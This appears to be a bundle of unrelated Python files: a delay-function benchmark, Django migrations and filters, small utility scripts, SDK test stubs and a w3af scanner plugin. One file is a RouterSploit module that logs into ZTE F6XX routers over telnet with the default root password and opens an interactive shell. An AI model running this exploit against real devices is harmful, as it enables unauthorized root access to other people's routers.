if(ycap == pi):
return 1, vt
return 0, vt
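# The check uses commutativity of exponentiation: pi = xcap^(2^T) = (x^Tcap)^(2^T) = (x^(2^T))^Tcap = y^Tcap (mod N),
# so the verifier only performs a single exponentiation by the secret challenge Tcap.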
# In[12]:
def DH_Main_1(Lambda, N, x, xcap, T, Tcap):
y, pi, et = DH_Eval_1(Lambda, N, x, xcap, T)
out, vt = DH_Verify_1(Lambda, N, x, xcap, T, Tcap, y, pi)
if(out==1):
print("\nAccept")
else:
print("\nReject")
return et, vt
# ## The proposed VDF Scheme -- 2 (Optimized version of the Scheme - 1)
# In[13]:
def DH_Eval_2(Lambda, N, x, T):
start = time.time()
y = power(x, 2**T, N)
end = time.time()
et = round((end-start) * 1000, 5)
# print("\nEvaluation Time:", {et})
return y, et
# In[14]:
def DH_Verify_2(y, Gamma):
start = time.time()
GammaCap = hashlib.sha512(str(y).encode())
end = time.time()
vt = round((end-start) * 1000, 5)
# print("\nVerification Time:", {vt})
if(GammaCap.hexdigest() == Gamma.hexdigest()):
return 1, vt
return 0, vt
# In[15]:
def DH_Main_2(Lambda, N, x, T, Gamma):
y, et = DH_Eval_2(Lambda, N, x, T)
out, vt = DH_Verify_2(y, Gamma)
if(out==1):
print("\nAccept")
else:
print("\nReject")
return et, vt
# # Graph Plots
# ## Setup Time
# In[16]:
def Setup_Time_Plot(Time, dhvdf_1_st, dhvdf_2_st, wesvdf_st, pievdf_st):
for i in range(len(dhvdf_1_st)):
# plotting the points of Proposed VDF-1
plt.plot(Time, dhvdf_1_st[i], label = "Proposed VDF-1", color='green', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='green', markersize=12)
# plotting the points of Proposed VDF-2
plt.plot(Time, dhvdf_2_st[i], label = "Proposed VDF-2", color='blue', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='blue', markersize=12)
# plotting the points of Proposed Wesoloski's VDF
plt.plot(Time, wesvdf_st[i], label = "Wesoloski VDF", color='orange', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='orange', markersize=12)
# plotting the points of Proposed Pietrzak's VDF
plt.plot(Time, pievdf_st[i], label = "Pietrzak VDF", color='red', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='red', markersize=12)
# setting x and y axis range
# plt.ylim(1,10)
# plt.xlim(10, 15)
# naming the x axis
plt.xlabel('Number of Exponentiations (log scale)')
# naming the y axis
plt.ylabel('Time (s x 1000) ')
# giving a title to my graph
plt.title('VDF Setup Time')
# show a legend on the plot
plt.legend()
# function to show the plot
plt.show()
# ## Evaluation Time
# In[17]:
def Eval_Time_Plot(Time, dhvdf_1_et, dhvdf_2_et, wesvdf_et, pievdf_et):
for i in range(len(dhvdf_1_et)):
# plotting the points of Proposed VDF-1
plt.plot(Time, dhvdf_1_et[i], label = "Proposed VDF-1", color='green', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='green', markersize=12)
# plotting the points of Proposed VDF-2
plt.plot(Time, dhvdf_2_et[i], label = "Proposed VDF-2", color='blue', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='blue', markersize=12)
# plotting the points of Proposed Wesoloski's VDF
plt.plot(Time, wesvdf_et[i], label = "Wesoloski VDF", color='orange', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='orange', markersize=12)
# plotting the points of Proposed Pietrzak's VDF
plt.plot(Time, pievdf_et[i], label = "Pietrzak VDF", color='red', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='red', markersize=12)
# setting x and y axis range
# plt.ylim(1,10)
# plt.xlim(10, 15)
# naming the x axis
plt.xlabel('Number of Exponentiations (log scale)')
# naming the y axis
plt.ylabel('Time (s x 1000) ')
# giving a title to my graph
plt.title('VDF Evaluation Time')
# show a legend on the plot
plt.legend()
# function to show the plot
plt.show()
# ## Proof Generation Time
# In[18]:
def Proof_Time_Plot(Time, dhvdf_1_pt, dhvdf_2_pt, wesvdf_pt, pievdf_pt):
for i in range(len(dhvdf_1_pt)):
# plotting the points of Proposed VDF-1
plt.plot(Time, dhvdf_1_pt[i], label = "Proposed VDF-1", color='green', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='green', markersize=12)
# plotting the points of Proposed VDF-2
plt.plot(Time, dhvdf_2_pt[i], label = "Proposed VDF-2", color='blue', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='blue', markersize=12)
# plotting the points of Proposed Wesoloski's VDF
plt.plot(Time, wesvdf_pt[i], label = "Wesoloski VDF", color='orange', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='orange', markersize=12)
# plotting the points of Proposed Pietrzak's VDF
plt.plot(Time, pievdf_pt[i], label = "Pietrzak VDF", color='red', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='red', markersize=12)
# setting x and y axis range
# plt.ylim(1,10)
# plt.xlim(10, 15)
# naming the x axis
plt.xlabel('Number of Exponentiations (log scale)')
# naming the y axis
plt.ylabel('Time (s x 1000) ')
# giving a title to my graph
plt.title('VDF Proof Generation Time')
# show a legend on the plot
plt.legend()
# function to show the plot
plt.show()
# ## Verification Time
# In[19]:
def Verification_Time_Plot(Time, dhvdf_1_vt, dhvdf_2_vt, wesvdf_vt, pievdf_vt):
for i in range(len(dhvdf_1_vt)):
# plotting the points of Proposed VDF-1
plt.plot(Time, dhvdf_1_vt[i], label = "Proposed VDF-1", color='green', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='green', markersize=12)
# plotting the points of Proposed VDF-2
plt.plot(Time, dhvdf_2_vt[i], label = "Proposed VDF-2", color='blue', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='blue', markersize=12)
# plotting the points of Proposed Wesoloski's VDF
plt.plot(Time, wesvdf_vt[i], label = "Wesoloski VDF", color='orange', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='orange', markersize=12)
# plotting the points of Proposed Pietrzak's VDF
plt.plot(Time, pievdf_vt[i], label = "Pietrzak VDF", color='red', linestyle='solid', linewidth = 1,
marker='.', markerfacecolor='red', markersize=12)
# setting x and y axis range
# plt.ylim(1,10)
# plt.xlim(10, 15)
# naming the x axis
plt.xlabel('Number of Exponentiations (log scale)')
# naming the y axis
plt.ylabel('Time (s x 1000) ')
# giving a title to my graph
plt.title('VDF Verification Time')
# show a legend on the plot
plt.legend()
# function to show the plot
plt.show()
# # Main Function
# In[ ]:
if __name__=="__main__":
dhvdf_1_st = []
dhvdf_1_et = []
dhvdf_1_pt = []
dhvdf_1_vt = []
dhvdf_2_st = []
dhvdf_2_et = []
dhvdf_2_pt = []
dhvdf_2_vt = []
wesvdf_st = []
wesvdf_et = []
wesvdf_pt = []
wesvdf_vt = []
pievdf_st = []
pievdf_et = []
pievdf_pt = []
pievdf_vt = []
    for i in range(5, 6): # Lambda = 2**i; this run only uses Lambda = 32 (use range(9, 12) for 512, 1024, 2048)
Lambda = 2**i
dhvdf1st = []
dhvdf1et = []
dhvdf1pt = []
dhvdf1vt = []
dhvdf2st = []
dhvdf2et = []
dhvdf2pt = []
dhvdf2vt = []
wesvdfst = []
wesvdfet = []
wesvdfpt = []
wesvdfvt = []
pievdfst = []
pievdfet = []
pievdfpt = []
pievdfvt = []
Time = []
for j in range (14, 21): # T = 2^14, 2^15, 2^16, 2^17, 2^18, 2^19, 2^20
N, x, xcap, T, Tcap, Gamma, st_1, st_2, st_3 = Setup(Lambda, j)
# print("The value of N:", N)
# print("The Value of x:", x)
# print("The Value of xcap:", xcap)
# print("The Value of T:", T)
Time.append(j)
print("\nRound --> ", i, j)
print("\n ------- Efficient and Tight Verifiable Delay Function -- 1 -------\n")
et, vt = DH_Main_1(Lambda, N, x, xcap, T, Tcap)
dhvdf1st.append(st_1)
dhvdf1et.append(et)
dhvdf1pt.append(0)
dhvdf1vt.append(vt)
print("\n ------- Efficient and Tight Verifiable Delay Function -- 2 -------\n")
et, vt = DH_Main_2(Lambda, N, x, T, Gamma)
dhvdf2st.append(st_2)
dhvdf2et.append(et)
dhvdf2pt.append(0)
dhvdf2vt.append(vt)
print("\n ------- Wesoloski's Verifiable Delay Function (Efficient VDF) -------\n")
et, pt, vt = Wes_Main(Lambda, N, x, T)
wesvdfst.append(st_3)
wesvdfet.append(et)
wesvdfpt.append(pt)
wesvdfvt.append(vt)
print("\n ------- Pietrzak's Verifiable Delay Function (Simple VDF) -------\n")
et, pt, vt = Pie_Main(Lambda, N, x, T)
pievdfst.append(st_3)
pievdfet.append(et)
pievdfpt.append(pt)
pievdfvt.append(vt)
dhvdf_1_st.append(dhvdf1st)
dhvdf_1_et.append(dhvdf1et)
dhvdf_1_pt.append(dhvdf1pt)
dhvdf_1_vt.append(dhvdf1vt)
dhvdf_2_st.append(dhvdf2st)
dhvdf_2_et.append(dhvdf2et)
dhvdf_2_pt.append(dhvdf2pt)
dhvdf_2_vt.append(dhvdf2vt)
wesvdf_st.append(wesvdfst)
wesvdf_et.append(wesvdfet)
wesvdf_pt.append(wesvdfpt)
wesvdf_vt.append(wesvdfvt)
pievdf_st.append(pievdfst)
pievdf_et.append(pievdfet)
pievdf_pt.append(pievdfpt)
pievdf_vt.append(pievdfvt)
print("\n ------- VDF Setup Time Graphs -------\n")
Setup_Time_Plot(Time, dhvdf_1_st, dhvdf_2_st, wesvdf_st, pievdf_st)
print("\n ------- VDF Evaluation Time Graphs -------\n")
Eval_Time_Plot(Time, dhvdf_1_et, dhvdf_2_et, wesvdf_et, pievdf_et)
print("\n ------- VDF Proof Generation Time Graphs -------\n")
Proof_Time_Plot(Time, dhvdf_1_pt, dhvdf_2_pt, wesvdf_pt, pievdf_pt)
print("\n ------- VDF Verification Time Graphs -------\n")
Verification_Time_Plot(Time, dhvdf_1_vt, dhvdf_2_vt, wesvdf_vt, pievdf_vt)
|
# Generated by Django 3.1 on 2020-09-09 00:28
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('resources', '0003_auto_20200819_1748'),
]
operations = [
migrations.AddField(
model_name='job',
name='description',
field=models.CharField(default='', max_length=512),
preserve_default=False,
),
migrations.AddField(
model_name='job',
name='name',
field=models.CharField(default='', max_length=128),
preserve_default=False,
),
migrations.AlterField(
model_name='host',
name='description',
field=models.CharField(max_length=512),
),
migrations.AlterField(
model_name='hostgroup',
name='description',
field=models.CharField(max_length=512),
),
migrations.AlterField(
model_name='jobgroup',
name='description',
field=models.CharField(max_length=512),
),
]
|
from fabric.api import local
from jinja2 import Environment, FileSystemLoader
template_env = Environment(loader=FileSystemLoader('.'))
def build():
#template = template_env.get_template('source/index.html')
# Template to generate the presentation
template = template_env.get_template('mobile_test_automation_source/index.html')
rendered_template = template.render()
#with open('presentation/index.html', 'wb') as fh:
# fh.write(rendered_template)
# the actual presentation
with open('mobile_test_automation_presentation/index.html', 'wb') as fh:
fh.write(rendered_template)
def publish():
build()
#local('ghp-import -p presentation')
local('ghp-import -p mobile_test_automation_presentation')
|
# -*- coding: utf-8 -*-
"""
convert from 16bit tiff to 16bit png.
======================================
"""
# import standard libraries
import os
# import third-party libraries
import numpy as np
import cv2
# import my libraries
# information
__author__ = 'Toru Yoshihara'
__copyright__ = 'Copyright (C) 2020 - Toru Yoshihara'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Toru Yoshihara'
__email__ = 'toru.ver.11 at-sign gmail.com'
__all__ = []
if __name__ == '__main__':
src_name_list = [
"./img/test_natual_image_hdr10_umi.tif"]
dst_name_list = [
"./img/test_natual_image_hdr10_umi.png"]
for src, dst in zip(src_name_list, dst_name_list):
img = cv2.imread(src, cv2.IMREAD_ANYDEPTH | cv2.IMREAD_COLOR)
cv2.imwrite(dst, img)
|
from django_filters import rest_framework as filter
from .models import Usuario, Classificacao, LogAutenticacao
from empresa.filters import lookup_types_empresa
lookup_types_usuario = {
'uuid': ['exact', 'in', ],
#'codigo': ['exact', 'contains', 'gt', 'gte', 'lt', 'lte', 'in', 'range'],
'username': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'first_name': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'last_name': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'email': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'telefone': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'celular': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'classificacao': ['exact', ],
'observacoes': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'media_avaliacoes': ['exact', 'contains', 'gt', 'gte', 'lt', 'lte', 'in', 'range'],
'empresa': ['exact', ],
'last_login': ['exact', ],
'is_staff': ['exact', ],
'is_manager': ['exact', ],
'is_superuser': ['exact', ],
'is_active': ['exact', ],
'groups': [],
}
lookup_types_classificacao = {
'uuid': ['exact', 'in', ],
'codigo': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'nome': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'descricao': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
}
lookup_types_log_autenticacao = {
'ip': ['exact', 'iexact', 'icontains', 'istartswith', 'iendswith', 'in', 'iregex', ],
'autenticado': ['exact', ],
'data_autenticacao': [
'exact',
'range',
'year', 'year__gte', 'year__gt', 'year__lte', 'year__lt', 'year__range', 'year__in',
'month', 'month__gte', 'month__gt', 'month__lte', 'month__lt', 'month__range', 'month__in',
'day', 'day__gte', 'day__gt', 'day__lte', 'day__lt', 'day__range', 'day__in',
'gte',
'gt',
'lte',
'lt',
'in',
],
'hora_autenticacao': [
'exact',
'range',
'hour', 'hour__gte', 'hour__gt', 'hour__lte', 'hour__lt', 'hour__range', 'hour__in',
'minute', 'minute__gte', 'minute__gt', 'minute__lte', 'minute__lt', 'minute__range', 'minute__in',
'second', 'second__gte', 'second__gt', 'second__lte', 'second__lt', 'second__range', 'second__in',
'gte',
'gt',
'lte',
'lt',
'in',
],
'usuario': ['exact', ],
}
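# django-filter turns each field/lookup pair below into a query parameter on the generated
# FilterSet, e.g. ?username__icontains=<value> or ?data_autenticacao__year__gte=<year>.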
class UsuarioFilter(filter.FilterSet):
class Meta:
model = Usuario
fields = {
'uuid': lookup_types_usuario['uuid'],
#'codigo': lookup_types_usuario['codigo'],
'username': lookup_types_usuario['username'],
'first_name': lookup_types_usuario['first_name'],
'last_name': lookup_types_usuario['last_name'],
'email': lookup_types_usuario['email'],
'telefone': lookup_types_usuario['telefone'],
'celular': lookup_types_usuario['celular'],
            'classificacao': lookup_types_usuario['classificacao'],
'classificacao__codigo': lookup_types_classificacao['codigo'],
'classificacao__nome': lookup_types_classificacao['nome'],
'classificacao__descricao': lookup_types_classificacao['descricao'],
'observacoes': lookup_types_usuario['observacoes'],
'media_avaliacoes': lookup_types_usuario['media_avaliacoes'],
'empresa': lookup_types_usuario['empresa'],
'empresa__cpf_cnpj': lookup_types_empresa['cpf_cnpj'],
'empresa__razao_social': lookup_types_empresa['razao_social'],
'empresa__nome_fantasia': lookup_types_empresa['nome_fantasia'],
'empresa__logradouro': lookup_types_empresa['logradouro'],
'empresa__numero': lookup_types_empresa['numero'],
'empresa__complemento': lookup_types_empresa['complemento'],
'empresa__bairro': lookup_types_empresa['bairro'],
'empresa__municipio': lookup_types_empresa['municipio'],
'empresa__uf': lookup_types_empresa['uf'],
'empresa__cep': lookup_types_empresa['cep'],
'empresa__pais': lookup_types_empresa['pais'],
'empresa__telefone': lookup_types_empresa['telefone'],
'empresa__media_avaliacoes': lookup_types_empresa['media_avaliacoes'],
'empresa__prestadora_servico': lookup_types_empresa['prestadora_servico'],
'empresa__ativo': lookup_types_empresa['ativo'],
'last_login': lookup_types_usuario['last_login'],
'is_staff': lookup_types_usuario['is_staff'],
'is_manager': lookup_types_usuario['is_manager'],
'is_superuser': lookup_types_usuario['is_superuser'],
'is_active': lookup_types_usuario['is_active'],
'groups': lookup_types_usuario['groups'],
}
class ClassificacaoFilter(filter.FilterSet):
class Meta:
model = Classificacao
fields = {
'uuid': lookup_types_classificacao['uuid'],
'codigo': lookup_types_classificacao['codigo'],
'nome': lookup_types_classificacao['nome'],
'descricao': lookup_types_classificacao['descricao'],
}
class LogAutenticacaoFilter(filter.FilterSet):
class Meta:
model = LogAutenticacao
fields = {
'ip': lookup_types_log_autenticacao['ip'],
'autenticado': lookup_types_log_autenticacao['autenticado'],
'data_autenticacao': lookup_types_log_autenticacao['data_autenticacao'],
'hora_autenticacao': lookup_types_log_autenticacao['hora_autenticacao'],
'usuario': lookup_types_log_autenticacao['usuario'],
#'usuario__codigo': lookup_types_usuario['codigo'],
'usuario__username': lookup_types_usuario['username'],
'usuario__first_name': lookup_types_usuario['first_name'],
'usuario__last_name': lookup_types_usuario['last_name'],
'usuario__email': lookup_types_usuario['email'],
'usuario__telefone': lookup_types_usuario['telefone'],
'usuario__celular': lookup_types_usuario['celular'],
            'usuario__classificacao': lookup_types_usuario['classificacao'],
'usuario__classificacao__codigo': lookup_types_classificacao['codigo'],
'usuario__classificacao__nome': lookup_types_classificacao['nome'],
'usuario__classificacao__descricao': lookup_types_classificacao['descricao'],
'usuario__observacoes': lookup_types_usuario['observacoes'],
'usuario__media_avaliacoes': lookup_types_usuario['media_avaliacoes'],
'usuario__empresa': lookup_types_usuario['empresa'],
'usuario__empresa__cpf_cnpj': lookup_types_empresa['cpf_cnpj'],
'usuario__empresa__razao_social': lookup_types_empresa['razao_social'],
'usuario__empresa__nome_fantasia': lookup_types_empresa['nome_fantasia'],
'usuario__empresa__logradouro': lookup_types_empresa['logradouro'],
'usuario__empresa__numero': lookup_types_empresa['numero'],
'usuario__empresa__complemento': lookup_types_empresa['complemento'],
'usuario__empresa__bairro': lookup_types_empresa['bairro'],
'usuario__empresa__municipio': lookup_types_empresa['municipio'],
'usuario__empresa__uf': lookup_types_empresa['uf'],
'usuario__empresa__cep': lookup_types_empresa['cep'],
'usuario__empresa__pais': lookup_types_empresa['pais'],
'usuario__empresa__telefone': lookup_types_empresa['telefone'],
'usuario__empresa__media_avaliacoes': lookup_types_empresa['media_avaliacoes'],
'usuario__empresa__prestadora_servico': lookup_types_empresa['prestadora_servico'],
'usuario__empresa__ativo': lookup_types_empresa['ativo'],
'usuario__last_login': lookup_types_usuario['last_login'],
'usuario__is_staff': lookup_types_usuario['is_staff'],
'usuario__is_manager': lookup_types_usuario['is_manager'],
'usuario__is_superuser': lookup_types_usuario['is_superuser'],
'usuario__is_active': lookup_types_usuario['is_active'],
'usuario__groups': lookup_types_usuario['groups'],
}
|
from scipy.io import wavfile
import soundfile as sf
from pesq import pesq
def cal_pesq(f1,f2):
ref,rate = sf.read(f1)
deg,rate = sf.read(f2)
print(f1,f2)
print('wb', pesq(rate, ref, deg, 'wb'))
print('nb', pesq(rate, ref, deg, 'nb'))
cal_pesq('./nearspeech.wav', './output.wav')
cal_pesq('./nearspeech.wav', './rec.wav')
|
import telnetlib
from routersploit import (
exploits,
print_status,
print_success,
print_error,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for ZTE F6XX default root password.
    If the target is vulnerable, it is possible to authenticate to the device.
"""
__info__ = {
'name': 'ZTE F6XX Default root',
        'description': 'Module exploits ZTE F6XX default root password. If the target is vulnerable, it is possible to authenticate to the device.',
'authors': [
'devilscream', # vulnerability discovery & routersploit module
],
'references': [
'http://www.ironbugs.com/2016/02/hack-and-patch-your-zte-f660-routers.html',
],
'devices': [
'ZTE ZXA10 F660',
'ZTE ZXA10 F609',
'ZTE ZXA10 F620',
]
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1', validators=validators.ipv4) # target address
telnet_port = exploits.Option(23, 'Target Telnet port', validators=validators.integer) # target telnet port
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
def run(self):
try:
print_status("Trying to authenticate to the telnet server")
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
if i != -1:
print_error("Exploit failed")
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
print_success("Authentication successful")
tn.write("\r\n")
tn.interact()
else:
print_error("Exploit failed")
tn.close()
except Exception:
print_error("Connection error {}:{}".format(self.target, self.telnet_port))
@mute
def check(self):
try:
tn = telnetlib.Telnet(self.target, self.telnet_port, timeout=10)
tn.expect(["Login: ", "login: "], 5)
tn.write(self.username + "\r\n")
tn.expect(["Password: ", "password"], 5)
tn.write(self.password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)
tn.close()
if i != -1:
return False # target is not vulnerable
else:
if any(map(lambda x: x in res, ["#", "$", ">"])):
return True # target is vulnerable
except Exception:
return False # target is not vulnerable
return False # target is not vulnerable
|
"""
server_status.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import re
import w3af.core.controllers.output_manager as om
import w3af.core.data.kb.knowledge_base as kb
import w3af.core.data.constants.severity as severity
from w3af.core.controllers.plugins.infrastructure_plugin import InfrastructurePlugin
from w3af.core.controllers.core_helpers.fingerprint_404 import is_404
from w3af.core.controllers.exceptions import RunOnce
from w3af.core.controllers.misc.decorators import runonce
from w3af.core.data.parsers.doc.url import URL
from w3af.core.data.kb.vuln import Vuln
from w3af.core.data.kb.info import Info
from w3af.core.data.request.fuzzable_request import FuzzableRequest
class server_status(InfrastructurePlugin):
"""
Find new URLs from the Apache server-status cgi.
:author: Andres Riancho (andres.riancho@gmail.com)
"""
def __init__(self):
InfrastructurePlugin.__init__(self)
# Internal variables
self._shared_hosting_hosts = []
@runonce(exc_class=RunOnce)
def discover(self, fuzzable_request, debugging_id):
"""
Get the server-status and parse it.
:param debugging_id: A unique identifier for this call to discover()
:param fuzzable_request: A fuzzable_request instance that contains
(among other things) the URL to test.
"""
base_url = fuzzable_request.get_url().base_url()
server_status_url = base_url.url_join('server-status')
response = self._uri_opener.GET(server_status_url, cache=True)
if not is_404(response) and response.get_code() not in range(400, 404):
if 'apache' in response.get_body().lower():
msg = 'Apache server-status module is enabled and accessible.'
msg += ' The URL is: "%s"' % response.get_url()
om.out.information(msg)
self._extract_server_version(fuzzable_request, response)
self._extract_urls(fuzzable_request, response)
self._report_shared_hosting(fuzzable_request, response)
def _extract_server_version(self, fuzzable_request, response):
"""
Get the server version from the HTML:
<dl><dt>Server Version: Apache/2.2.9 (Unix)</dt>
"""
for version in re.findall('<dl><dt>Server Version: (.*?)</dt>',
response.get_body()):
# Save the results in the KB so the user can look at it
desc = 'The web server has the apache server status module'\
' enabled which discloses the following remote server'\
' version: "%s".'
desc %= version
i = Info('Apache Server version', desc, response.id, self.get_name())
i.set_url(response.get_url())
om.out.information(i.get_desc())
kb.kb.append(self, 'server', i)
def _extract_urls(self, fuzzable_request, response):
"""
Extract information from the server-status page and send FuzzableRequest
instances to the core.
"""
self.output_queue.put(FuzzableRequest(response.get_url()))
# Now really parse the file and create custom made fuzzable requests
regex = '<td>.*?<td nowrap>(.*?)</td><td nowrap>.*? (.*?) HTTP/1'
for domain, path in re.findall(regex, response.get_body()):
if 'unavailable' in domain:
domain = response.get_url().get_domain()
# Check if the requested domain and the found one are equal.
if domain == response.get_url().get_domain():
proto = response.get_url().get_protocol()
found_url = proto + '://' + domain + path
found_url = URL(found_url)
# They are equal, request the URL and create the fuzzable
# requests
tmp_res = self._uri_opener.GET(found_url, cache=True)
if not is_404(tmp_res):
self.output_queue.put(FuzzableRequest(found_url))
else:
# This is a shared hosting server
self._shared_hosting_hosts.append(domain)
def _report_shared_hosting(self, fuzzable_request, response):
        # Now that we are outside the for loop, we can report the possible vulns
if len(self._shared_hosting_hosts):
desc = 'The web application under test seems to be in a shared'\
' hosting.'
v = Vuln.from_fr('Shared hosting', desc, severity.MEDIUM,
response.id, self.get_name(), fuzzable_request)
self._shared_hosting_hosts = list(set(self._shared_hosting_hosts))
v['also_in_hosting'] = self._shared_hosting_hosts
kb.kb.append(self, 'shared_hosting', v)
om.out.vulnerability(v.get_desc(), severity=v.get_severity())
msg = 'This list of domains, and the domain of the web application'\
' under test, all point to the same server:'
om.out.vulnerability(msg, severity=v.get_severity())
for url in self._shared_hosting_hosts:
om.out.vulnerability('- ' + url, severity=severity.MEDIUM)
def get_long_desc(self):
"""
:return: A DETAILED description of the plugin functions and features.
"""
return """
This plugin fetches the server-status file used by Apache, and parses it.
After parsing, new URLs are found, and in some cases, the plugin can deduce
the existence of other domains hosted on the same server.
"""
|
#!/usr/bin/env python3
from sys import argv
from math import cos, sin
from math import radians as toR
data = [x.strip() for x in open(argv[1]).readlines()]
x = 0
y = 0
wp = [10, 1] # x, y / EW, NS
for s in data:
dir = s[0]
amnt = int(s[1:])
if dir == "N":
wp[1] += amnt
elif dir == "E":
wp[0] += amnt
elif dir == "S":
wp[1] -= amnt
elif dir == "W":
wp[0] -= amnt
elif dir == "R":
# P2.x = P.x * cos(R) - P.y * sin(R)
# P2.y = P.x * sin(R) + P.y * cos(R)
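        # e.g. the initial waypoint (10, 1) rotated right by 90 degrees becomes (1, -10)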
x2 = (wp[0] * cos(-1 * toR(amnt))) - (wp[1] * sin(-1 * toR(amnt)))
y2 = (wp[0] * sin(-1 * toR(amnt))) + (wp[1] * cos(-1 * toR(amnt)))
wp[0] = x2
wp[1] = y2
elif dir == "L":
x2 = (wp[0] * cos(toR(amnt))) - (wp[1] * sin(toR(amnt)))
y2 = (wp[0] * sin(toR(amnt))) + (wp[1] * cos(toR(amnt)))
wp[0] = x2
wp[1] = y2
elif dir == "F":
x += wp[0] * amnt
y += wp[1] * amnt
manhattan = abs(x) + abs(y)
print(f"{manhattan:.0f}")
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 3
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0
from isi_sdk_8_0.api.upgrade_api import UpgradeApi # noqa: E501
from isi_sdk_8_0.rest import ApiException
class TestUpgradeApi(unittest.TestCase):
"""UpgradeApi unit test stubs"""
def setUp(self):
self.api = isi_sdk_8_0.api.upgrade_api.UpgradeApi() # noqa: E501
def tearDown(self):
pass
def test_create_cluster_add_remaining_node(self):
"""Test case for create_cluster_add_remaining_node
"""
pass
def test_create_cluster_archive_item(self):
"""Test case for create_cluster_archive_item
"""
pass
def test_create_cluster_assess_item(self):
"""Test case for create_cluster_assess_item
"""
pass
def test_create_cluster_commit_item(self):
"""Test case for create_cluster_commit_item
"""
pass
def test_create_cluster_firmware_assess_item(self):
"""Test case for create_cluster_firmware_assess_item
"""
pass
def test_create_cluster_firmware_upgrade_item(self):
"""Test case for create_cluster_firmware_upgrade_item
"""
pass
def test_create_cluster_patch_abort_item(self):
"""Test case for create_cluster_patch_abort_item
"""
pass
def test_create_cluster_patch_patch(self):
"""Test case for create_cluster_patch_patch
"""
pass
def test_create_cluster_retry_last_action_item(self):
"""Test case for create_cluster_retry_last_action_item
"""
pass
def test_create_cluster_rollback_item(self):
"""Test case for create_cluster_rollback_item
"""
pass
def test_create_cluster_upgrade_item(self):
"""Test case for create_cluster_upgrade_item
"""
pass
def test_delete_cluster_patch_patch(self):
"""Test case for delete_cluster_patch_patch
"""
pass
def test_get_cluster_firmware_progress(self):
"""Test case for get_cluster_firmware_progress
"""
pass
def test_get_cluster_firmware_status(self):
"""Test case for get_cluster_firmware_status
"""
pass
def test_get_cluster_node(self):
"""Test case for get_cluster_node
"""
pass
def test_get_cluster_nodes(self):
"""Test case for get_cluster_nodes
"""
pass
def test_get_cluster_patch_patch(self):
"""Test case for get_cluster_patch_patch
"""
pass
def test_get_upgrade_cluster(self):
"""Test case for get_upgrade_cluster
"""
pass
def test_list_cluster_patch_patches(self):
"""Test case for list_cluster_patch_patches
"""
pass
def test_update_cluster_upgrade(self):
"""Test case for update_cluster_upgrade
"""
pass
if __name__ == '__main__':
unittest.main()
|
import csv
import statistics
durations = []
with open('fast_a_better_vB_100.csv') as csv_file:
    csv_reader = csv.reader(csv_file, delimiter=',')
    for row in csv_reader:
        durations.append(float(row[3]))
with open('../api-tests/resources/bpmn/fast_a_better/fast_a_better_vB_100.json', 'w+') as txt_file:
    txt_file.write("{\n")
    txt_file.write('"durations": [\n')
    # join with commas so the array has no trailing comma and the file is valid JSON
    txt_file.write(',\n'.join(str(d) for d in durations) + '\n')
    txt_file.write('],\n')
    txt_file.write('"interarrivalTime": ' + str(statistics.fmean(durations)) + '\n')
    txt_file.write('}')
|
# Use modern Python
from __future__ import absolute_import, print_function, unicode_literals
# Django imports
from django.test import TestCase, SimpleTestCase
# External imports
from django_prbac.models import Grant, Role
# CCHQ imports
from corehq.apps.hqadmin.management.commands import cchq_prbac_bootstrap
from fab.pillow_settings import apply_pillow_actions_to_pillows, \
get_pillows_for_env, get_single_pillow_action
